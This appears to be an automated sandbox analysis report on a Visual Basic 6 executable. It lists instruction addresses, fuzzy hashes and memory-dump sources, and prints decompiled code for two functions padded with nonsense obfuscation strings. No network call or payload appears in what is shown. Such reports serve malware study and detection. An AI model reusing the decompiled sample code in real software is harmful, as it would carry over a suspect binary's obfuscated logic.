0x004018fa
0x004018fc
0x00401902
0x00401903
0x00401909
0x0040190b
0x0040190d
0x0040190f
0x00401911
0x00401913
0x00401915
0x00401917
0x00401919
0x0040191b
0x0040191d
0x0040191f
0x00401921
0x00401923
0x00401925
0x00401927
0x00401929
0x0040192a
0x0040192c
0x0040192f
0x00401931
0x00401931
0x00401937
0x00401938
0x004019aa
0x004019aa
0x004019ab
0x004019ad
0x004019af
0x004019b1
0x004019b3
0x004019b5
0x0040193b
0x0040193b
0x0040193c
0x0040193e
0x0040193f
0x00401940
0x00401941
0x00401947
0x00401950
0x00401952
0x00401954
0x00401955
0x00401958
0x0040195b
0x00401963
0x00401969
0x0040196a
0x0040196b
0x00401972
0x00401974
0x00401978
0x0040197a
0x0040197c
0x0040197d
0x0040197f
0x00401985
0x00401987
0x0040198e
0x00401990
0x00401992
0x00401994
0x00401996
0x00401998
0x0040199a
0x0040199d
0x004019a0
0x004019a2
0x004019a3
0x004019a5
0x004019a7
0x00000000
0x004019a7
0x0040193c
0x004019b6
0x004019bd
0x004019be
0x004019c3
0x004019c5
0x004019c7
0x004019c9
0x004019cb
0x004019cd
0x004019cf
0x004019d2
0x004019d4
0x004019d6
0x004019d8
0x004019da
0x004019dc
0x004019e0
0x004019e2
0x004019e4
0x004019e6
0x004019e8
0x004019ea
0x004019ec
0x004019ed
0x004019ef
0x004019f1
0x004019f4
0x004019f6
0x004019f8
0x004019fa
0x004019fc
0x004019fe
0x00401a00
0x00401a02
0x00401a04
0x00401a09
0x00401a0c
0x00401a0e
0x00401a0f
0x00401a16
0x00401a1a
0x00401a1e
0x00401a20
0x00401a22
0x00401a24
0x00401a26
0x00401a26
0x00401a27
0x00401a29
0x00401a2b
0x00401a2d
0x00401a2f
0x00401a31
0x00401a33
0x00401a33
0x00401a33
0x00401a36
0x00401a37
0x00401a9e
0x00401a9e
0x00401a9f
0x00401a39
0x00401a39
0x00401a3b
0x00401a3d
0x00401a3f
0x00401a42
0x00401a49
0x00401a4d
0x00401a4e
0x00401a56
0x00401a58
0x00401a59
0x00401a5e
0x00401a5f
0x00401a62
0x00401a63
0x00401a69
0x00401a6b
0x00401a6d
0x00401a6f
0x00401a71
0x00401a73
0x00401a75
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a89
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a91
0x00401a93
0x00401a99
0x00401a9b
0x00401a9d
0x00000000
0x00401a9d
0x00401a39
0x00401aa3
0x00401aa6
0x00401aa8
0x00401aaf
0x00401ab2
0x00401ab4
0x00401ab5
0x00401ab8
0x00401aba
0x00401abc
0x00401abe
0x00401ac0
0x00401ac2
0x00401ac4
0x00401ac6
0x00401ac8
0x00401aca
0x00401acc
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401add
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae6
0x00401ae8
0x00401aea
0x00401af1
0x00401af3
0x00401af5
0x00401af7
0x00401afe
0x00401b01
0x00401b05
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b11
0x00401b14
0x00401b16
0x00401b1d
0x00401b1f
0x00401b21
0x00401b23
0x00401b25
0x00401b27
0x00401b2b
0x00401b2d
0x00401b2f
0x00401b33
0x00401b35
0x00401b37
0x00401b3b
0x00401b3d
0x00401b3f
0x00401b43
0x00401b45
0x00401b47
0x00401b4b
0x00401b4d
0x00401b4f
0x00401b53
0x00401b55
0x00401b5d
0x00401b60
0x00401b61
0x00401b64
0x00401b66
0x00401b68
0x00401b68
0x00401b6a
0x00401b6c
0x00401b6e
0x00401b6f
0x00401b75
0x00401b7b
0x00401b81
0x00401b83
0x00401b85
0x00401b87
0x00401b89
0x00401b8d
0x00401b90
0x00401b96
0x00401b97
0x00401b99
0x00401b9b
0x00401b9e
0x00401b9f
0x00401ba1
0x00401ba1
0x00401ba2
0x00401ba5
0x00401ba8
0x00401baa
0x00401bac
0x00401bae
0x00401bb0
0x00401bb2
0x00401bb4
0x00401bb7
0x00401bb7
0x00401bba
0x00401bbc
0x00401bbd
0x00401bc0
0x00401bc2
0x00401bc4
0x00401bc6
0x00401bc8
0x00401be5
0x00401be5
0x00401be7
0x00401be9
0x00401bca
0x00401bcb
0x00401bcd
0x00401bd0
0x00401bd3
0x00401bd6
0x00401bd7
0x00401bdb
0x00401bdd
0x00401bdf
0x00401be1
0x00401be3
0x00000000
0x00401be3
0x00401bd0
0x00401bea
0x00401bec
0x00401bee
0x00401bf0
0x00401bf2
0x00401bf4
0x00401bf6
0x00401bf8
0x00401bfa
0x00401bfc
0x00401bfe
0x00401c00
0x00401c02
0x00401c04
0x00401c06
0x00401c08
0x00401c0a
0x00401c0c
0x00401c0e
0x00401c10
0x00401c12
0x00401c14
0x00401c15
0x00401c18
0x00401c19
0x00401c1c
0x00401c1f
0x00401c22
0x00401c23
0x00401c27
0x00401c29
0x00401c2b
0x00401c2d
0x00401c2f
0x00401c31
0x00401c33
0x00401c35
0x00401c35
0x00401c36
0x00401c38
0x00401c3a
0x00401c3c
0x00401c3e
0x00401c40
0x00401c42
0x00401c44
0x00401c46
0x00401c48
0x00401c4a
0x00401c4c
0x00401c4e
0x00401c50
0x00401c52
0x00401c54
0x00401c56
0x00401c58
0x00401c5a
0x00401c5c
0x00401c5e
0x00401c60
0x00401c62
0x00401c64
0x00401c66
0x00401c68
0x00401c6a
0x00401c6c
0x00401c6e
0x00401c70
0x00401c72
0x00401c74
0x00401c76
0x00401c78
0x00401c7a
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8c
0x00401c8e
0x00401c90
0x00401c92
0x00401c94
0x00401c96
0x00401c98
0x00401c9a
0x00401c9c
0x00401c9e
0x00401ca0
0x00401ca2
0x00401ca4
0x00401ca5
0x00401ca7
0x00401caa
0x00401cab
0x00401cad
0x00401cb1

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 00401888

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5cda833674051dae6df604f3d9ccaabb4df226bb263613be5393a065696cc8c3
Instruction ID: fb17e726e7873034415a4cace1b849a8f5a4c6f47997cda8bcaa5cbce2a276ac
Opcode Fuzzy Hash: 5cda833674051dae6df604f3d9ccaabb4df226bb263613be5393a065696cc8c3
Instruction Fuzzy Hash: 4F01996044E7C29FC3075B748966545BFB09E0329032B41DBD4C0CE0B3E2290EADD7A7

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A8CC26, Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

3&o, xrefs: 02A8CD42
`, xrefs: 02A8CE66

Memory Dump Source

Source File: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `$3&o
API String ID: 0-3188040812
Opcode ID: daa2888eab78d08ff1e0c3c2055cde7fe49f83dbe4ea1350c9109c52525fe6dc
Instruction ID: 654869d1f9e769ffd9a0d0ddd2700e991ea2eca488ff5ce8004b980d8488f140
Opcode Fuzzy Hash: daa2888eab78d08ff1e0c3c2055cde7fe49f83dbe4ea1350c9109c52525fe6dc
Instruction Fuzzy Hash: AF41E1B6601348EBDF78AE2A8D543DA77E3AF94350F64C12BDC0D8B254DB705A068F61

Uniqueness

Uniqueness Score: -1.00%

Function 02A930FB, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91e9c8e915eb5cad8588257944a9f2391682ec5ec0f7697a10eb582101932db
Instruction ID: 922335329ca620e0ca76272cd467e0109c70652ca7298fe563660500b1eb304a
Opcode Fuzzy Hash: f91e9c8e915eb5cad8588257944a9f2391682ec5ec0f7697a10eb582101932db
Instruction Fuzzy Hash: 38110579A05388CFCF34CF25CA99BD9B3B5AF59714F55809AD91A8B221C730AA05CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02A8D105, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02A8C5E2, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 02A92703, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00420C6D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00420C6D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				short _t125;
				short _t133;
				signed int _t136;
				signed int _t142;
				signed int _t147;
				void* _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t194;

				_t193 = _t192 - 0xc;
				 *[fs:0x0] = _t193;
				L00401540();
				_v16 = _t193;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
				L004017B6();
				L004017B6();
				L004017B6();
				L004017B6();
				 *_a32 =  *_a32 & 0x00000000;
				_push(0xbe);
				L00401756();
				L0040183A();
				_v88 = 0x19;
				_v96 = 2;
				_v188 = _v60;
				_v60 = _v60 & 0x00000000;
				_v72 = _v188;
				_v80 = 8;
				_push( &_v96);
				_push(0xf9);
				_push( &_v80);
				_push( &_v112);
				L0040168A();
				_v152 = L"monacanthid";
				_v160 = 0x8008;
				_push( &_v112);
				_t125 =  &_v160;
				_push(_t125);
				L00401660();
				_v164 = _t125;
				L00401846();
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L00401840();
				_t194 = _t193 + 0x10;
				if(_v164 != 0) {
					_push(_v32);
					_push(L"Pollenate4");
					L00401696();
					L0040183A();
					_push(0xa7);
					_push(L"Apokreos");
					L0040162A();
					L0040183A();
					_v192 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v192;
					_v80 = 8;
					_push(0xea);
					_push( &_v80);
					_push( &_v96);
					L00401624();
					_push( &_v96);
					L00401834();
					L0040183A();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L00401840();
					_t194 = _t194 + 0xc;
				}
				_v136 = L"12/12/12";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push( &_v96);
				L004015E8();
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t133 =  &_v160;
				_push(_t133);
				L00401738();
				_v164 = _t133;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t136 = _v164;
				if(_t136 != 0) {
					_push(L"Sjkler7");
					_push(L"Antagonistiske");
					_push(L"ADDEDLY");
					_push(L"RESELLS");
					L00401822();
					if( *0x4223c0 != 0) {
						_v200 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v200 = 0x4223c0;
					}
					_v164 =  *_v200;
					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
					asm("fclex");
					_v168 = _t142;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v164);
						_push(_v168);
						L004017C8();
						_v204 = _t142;
					}
					_v172 = _v64;
					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
					asm("fclex");
					_v176 = _t147;
					if(_v176 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x40259c);
						_push(_v172);
						_push(_v176);
						L004017C8();
						_v208 = _t147;
					}
					_t136 = _v60;
					_v196 = _t136;
					_v60 = _v60 & 0x00000000;
					L0040183A();
					L004017C2();
				}
				L004017B6();
				_push(0x421040);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t136;
			}

0x00420c70
0x00420c7f
0x00420c8b
0x00420c93
0x00420c96
0x00420c9d
0x00420cac
0x00420cb5
0x00420cc0
0x00420ccb
0x00420cd6
0x00420cde
0x00420ce1
0x00420ce6
0x00420cf0
0x00420cf5
0x00420cfc
0x00420d06
0x00420d0c
0x00420d16
0x00420d19
0x00420d23
0x00420d24
0x00420d2c
0x00420d30
0x00420d31
0x00420d36
0x00420d40
0x00420d4d
0x00420d4e
0x00420d54
0x00420d55
0x00420d5a
0x00420d64
0x00420d6c
0x00420d70
0x00420d74
0x00420d75
0x00420d77
0x00420d7c
0x00420d88
0x00420d8e
0x00420d91
0x00420d96
0x00420da0
0x00420da5
0x00420daa
0x00420daf
0x00420db9
0x00420dc1
0x00420dc7
0x00420dd1
0x00420dd4
0x00420ddb
0x00420de3
0x00420de7
0x00420de8
0x00420df0
0x00420df1
0x00420dfb
0x00420e03
0x00420e0b
0x00420e0f
0x00420e10
0x00420e12
0x00420e17
0x00420e17
0x00420e1a
0x00420e24
0x00420e37
0x00420e3f
0x00420e43
0x00420e44
0x00420e49
0x00420e53
0x00420e60
0x00420e61
0x00420e67
0x00420e68
0x00420e6d
0x00420e77
0x00420e7b
0x00420e7c
0x00420e7e
0x00420e86
0x00420e8f
0x00420e95
0x00420e9a
0x00420e9f
0x00420ea4
0x00420ea9
0x00420eb5
0x00420ed2
0x00420eb7
0x00420eb7
0x00420ebc
0x00420ec1
0x00420ec6
0x00420ec6
0x00420ee4
0x00420efc
0x00420eff
0x00420f01
0x00420f0e
0x00420f30
0x00420f10
0x00420f10
0x00420f12
0x00420f17
0x00420f1d
0x00420f23
0x00420f28
0x00420f28
0x00420f3a
0x00420f52
0x00420f58
0x00420f5a
0x00420f67
0x00420f8c
0x00420f69
0x00420f69
0x00420f6e
0x00420f73
0x00420f79
0x00420f7f
0x00420f84
0x00420f84
0x00420f93
0x00420f96
0x00420f9c
0x00420fa9
0x00420fb1
0x00420fb1
0x00420fbe
0x00420fc3
0x0042100a
0x00421012
0x0042101a
0x00421022
0x0042102a
0x00421032
0x0042103a
0x0042103f

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420C8B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CB5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CC0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CCB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CD6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420CE6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420CF0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420D31
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420D55
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420D64
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420D77
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420D96
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420DA0
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420DAF
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420DB9
#513.MSVBVM60(?,00000008,000000EA), ref: 00420DE8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420DF1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420DFB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420E03
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420E12
__vbaVarDup.MSVBVM60 ref: 00420E37
#542.MSVBVM60(?,?), ref: 00420E44
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420E68
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420E7E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420EA9
__vbaNew2.MSVBVM60(0040258C,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420EC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 00420F23
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420F7F
__vbaStrMove.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420FA9
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420FB1
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FBE
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 0042100A
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 00421012
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 0042101A
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 00421022

Strings

Sjkler7, xrefs: 00420E95
ADDEDLY, xrefs: 00420E9F
DIVARICATE, xrefs: 00420FB6
RESELLS, xrefs: 00420EA4
monacanthid, xrefs: 00420D36
Apokreos, xrefs: 00420DAA
Antagonistiske, xrefs: 00420E9A
Pollenate4, xrefs: 00420D91
12/12/12, xrefs: 00420E1A

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: 09ab68b88bf1a8ac43817a563a6d553a1f598c7454695803f8e7470ef805ca8e
Instruction ID: d50f01b18412fbc4580d9b8b1a70f8d0d5432c4d582dba75452fc105cedff475
Opcode Fuzzy Hash: 09ab68b88bf1a8ac43817a563a6d553a1f598c7454695803f8e7470ef805ca8e
Instruction Fuzzy Hash: FBA1B771E00218AFDB10EF91D885BDEB7B8BF04308F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F60E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041F60E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				short _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _t90;
				char* _t99;
				short _t100;
				char* _t104;
				signed int _t119;
				signed int _t124;
				intOrPtr _t154;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				L00401540();
				_v12 = _t154;
				_v8 = 0x4013a0;
				_v136 = L"appdata";
				_v144 = 8;
				L0040184C();
				_t90 =  &_v64;
				_push(_t90);
				L00401642();
				L0040183A();
				_push(_t90);
				_push(L"Picry");
				L0040172C();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t90));
				L00401846();
				L00401828();
				if(_v184 != 0) {
					_v136 = L"Langfredagene5";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L004016BA();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401840();
					_t154 = _t154 + 0xc;
					if( *0x4223c0 != 0) {
						_v204 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v204 = 0x4223c0;
					}
					_v184 =  *_v204;
					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
					asm("fclex");
					_v188 = _t119;
					if(_v188 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v184);
						_push(_v188);
						L004017C8();
						_v208 = _t119;
					}
					_v192 = _v48;
					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
					asm("fclex");
					_v196 = _t124;
					if(_v196 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40259c);
						_push(_v192);
						_push(_v196);
						L004017C8();
						_v212 = _t124;
					}
					_v28 = _v180;
					L004017C2();
				}
				_v72 = 0x93;
				_v80 = 2;
				_v136 = L"SUPERSERIOUS";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push(0xb2);
				_push( &_v64);
				_push( &_v96);
				L0040168A();
				_v168 = 0x454add;
				_v176 = 0x8003;
				_push( &_v96);
				_t99 =  &_v112;
				_push(_t99);
				L0040163C();
				_push(_t99);
				_t100 =  &_v176;
				_push(_t100);
				L00401738();
				_v184 = _t100;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401840();
				_t104 = _v184;
				if(_t104 != 0) {
					_v136 = L"Skovede1";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L00401852();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_t104 =  &_v64;
					_push(_t104);
					_push(2);
					L00401840();
					_push(L"galopbanernes");
					L004017E0();
					_push(_t104);
					L004016B4();
					L0040183A();
				}
				_v32 = 0xd66;
				_push(0x41f953);
				L00401846();
				L00401846();
				L00401846();
				return _t104;
			}

0x0041f613
0x0041f61e
0x0041f61f
0x0041f62b
0x0041f633
0x0041f636
0x0041f63d
0x0041f647
0x0041f65a
0x0041f65f
0x0041f662
0x0041f663
0x0041f66d
0x0041f672
0x0041f673
0x0041f678
0x0041f67f
0x0041f685
0x0041f68f
0x0041f697
0x0041f6a5
0x0041f6ab
0x0041f6b5
0x0041f6c8
0x0041f6d0
0x0041f6d4
0x0041f6d5
0x0041f6dd
0x0041f6de
0x0041f6e8
0x0041f6f0
0x0041f6f4
0x0041f6f5
0x0041f6f7
0x0041f6fc
0x0041f706
0x0041f723
0x0041f708
0x0041f708
0x0041f70d
0x0041f712
0x0041f717
0x0041f717
0x0041f735
0x0041f74d
0x0041f750
0x0041f752
0x0041f75f
0x0041f781
0x0041f761
0x0041f761
0x0041f763
0x0041f768
0x0041f76e
0x0041f774
0x0041f779
0x0041f779
0x0041f78b
0x0041f7a6
0x0041f7a9
0x0041f7ab
0x0041f7b8
0x0041f7da
0x0041f7ba
0x0041f7ba
0x0041f7bc
0x0041f7c1
0x0041f7c7
0x0041f7cd
0x0041f7d2
0x0041f7d2
0x0041f7e8
0x0041f7ef
0x0041f7ef
0x0041f7f4
0x0041f7fb
0x0041f802
0x0041f80c
0x0041f81f
0x0041f827
0x0041f828
0x0041f830
0x0041f834
0x0041f835
0x0041f83a
0x0041f844
0x0041f851
0x0041f852
0x0041f855
0x0041f856
0x0041f85b
0x0041f85c
0x0041f862
0x0041f863
0x0041f868
0x0041f872
0x0041f876
0x0041f87a
0x0041f87b
0x0041f87d
0x0041f885
0x0041f88e
0x0041f890
0x0041f89a
0x0041f8ad
0x0041f8b5
0x0041f8b9
0x0041f8ba
0x0041f8c2
0x0041f8c3
0x0041f8cd
0x0041f8d5
0x0041f8d6
0x0041f8d9
0x0041f8da
0x0041f8dc
0x0041f8e4
0x0041f8e9
0x0041f8ee
0x0041f8ef
0x0041f8f9
0x0041f8f9
0x0041f8fe
0x0041f904
0x0041f93d
0x0041f945
0x0041f94d
0x0041f952

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F62B
__vbaVarDup.MSVBVM60 ref: 0041F65A
#667.MSVBVM60(?), ref: 0041F663
__vbaStrMove.MSVBVM60(?), ref: 0041F66D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F678
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F68F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F697
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F6C8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F6D5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F6DE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F6E8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F6F7
__vbaNew2.MSVBVM60(0040258C,004223C0), ref: 0041F712
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041F774
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041F7CD
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041F7EF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F81F
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F835
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F856
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F863
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F87D
__vbaVarDup.MSVBVM60 ref: 0041F8AD
#522.MSVBVM60(?,?), ref: 0041F8BA
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F8C3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F8CD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F8DC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F8E9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F8EF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F8F9
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F93D
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F945
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F94D

Strings

galopbanernes, xrefs: 0041F8E4
